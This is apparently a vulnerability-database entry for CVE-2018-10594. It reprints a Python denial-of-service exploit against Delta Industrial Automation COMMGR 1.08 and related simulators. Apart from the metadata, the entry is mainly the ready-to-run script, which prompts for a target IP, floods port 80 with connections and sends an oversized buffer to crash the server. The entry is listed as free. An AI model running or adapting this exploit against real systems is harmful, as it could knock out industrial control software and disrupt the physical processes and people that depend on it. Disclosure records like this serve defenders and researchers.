ID
VAR-E-201807-0264
TITLE
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow Exploit
Trust: 0.6
AFFECTED PRODUCTS
vendor: | delta | model: | industrial automation commgr | scope: | eq | version: | 1.08 | Trust: 0.6 |
EXPLOIT
# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
- Remote STACK-BASED BUFFER OVERFLOW
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.deltaww.com/
# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
# Version:
COMMGR Version 1.08 and prior.
DVPSimulator EH2, EH3, ES2, SE, SS2
AHSIM_5x0, AHSIM_5x1
# Tested on: Kali Linux
# CVE : CVE-2018-10594
#Run exploit, result DOS
import socket
ip = raw_input("[+] IP to attack: ")
sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,80)))
print "[+] Connection %d" % i
crash1 = "\x41"*4412 +"\X42"*1000
sarr[i].send(crash1+'\r\n')
i+=1
except socket.error:
print "[*] Server crashed "
raw_input()
break
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Stack Buffer Overflow Exploit
Trust: 0.6
EXTERNAL IDS
db: | 0DAYTODAY | id: | 30657 | Trust: 0.6 |
db: | EDBNET | id: | 98497 | Trust: 0.6 |
REFERENCES
url: | https://0day.today/exploits/30657 | Trust: 0.6 |
SOURCES
db: | EDBNET | id: | 98497 |
LAST UPDATE DATE
2022-07-27T09:58:20.633000+00:00
SOURCES RELEASE DATE
db: | EDBNET | id: | 98497 | date: | 2018-07-03T00:00:00 |